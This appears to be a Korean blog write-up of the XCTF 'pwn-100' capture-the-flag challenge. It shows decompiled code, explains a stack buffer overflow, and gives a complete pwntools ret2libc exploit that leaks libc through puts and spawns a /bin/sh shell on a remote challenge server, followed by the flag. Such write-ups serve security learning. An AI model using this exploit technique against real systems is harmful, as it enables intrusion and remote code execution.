-
Disassembly 디스어셈블리
undefined8 main() { setbuf(_reloc.stdin, 0); setbuf(_reloc.stdout, 0); do(); return 0; }
void do() { int64_t var_40h; // rbp-0x40 _read(&var_40h, 200); puts("bye~"); return; }
void _read(void *addr, undefined8 size) { for(int i=0; i<size; i++){ read(0, addr+i, 1); } return; }
do에서 _read를 호출해 rbp-0x40에 200바이트만큼 입력받아 스택 버퍼 오버플로우가 발생한다.
Return Oriented Programming
puts를 이용해 라이브러리 버전을 구한 다음 system("/bin/sh")를 호출하면 문제를 해결할 수 있다.
Code
더보기from pwn import * binary = "./pwn-100" lib = "../../lib/libc6_2.23-0ubuntu11_amd64.so" server = "111.200.241.244" port = 56580 # context.log_level = 'debug' context.binary = binary if True: p = remote(server, port) else: p = gdb.debug([binary], gdbscript = 'set debug-file-directory ./x86_64-linux-gnu') e = ELF(binary) r = ROP(e) l = ELF(lib) e.checksec() prdi = r.find_gadget(['pop rdi', 'ret'])[0] puts_plt = e.plt["puts"] puts_got = e.got["puts"] setbuf_got = e.got["setbuf"] do = 0x40068e payload = b"\x90"*0x48 payload += p64(prdi) payload += p64(puts_got) payload += p64(puts_plt) payload += p64(do) payload += b"\x90"*(200-len(payload)) p.send(payload) p.recvline() puts = u64(p.recvline().strip().ljust(8, b"\x00")) libc = puts - l.symbols["puts"] log.info("libc : " + hex(libc)) binsh = libc + next(l.search(b"/bin/sh\x00")) system = libc + l.symbols["system"] payload = b"\x90"*0x48 payload += p64(prdi) payload += p64(binsh) payload += p64(system) payload += b"\x90"*(200-len(payload)) p.send(payload) p.interactive()
Flag
cyberpeace{e8a8c2e39962c4cd00fde674e17d6886}
'CTF > XCTF' 카테고리의 다른 글
greeting (0) 2021.02.11 Recho (0) 2021.02.11 welpwn (0) 2021.02.11 Mary_Morton (0) 2021.02.11 int_overflow (0) 2021.01.21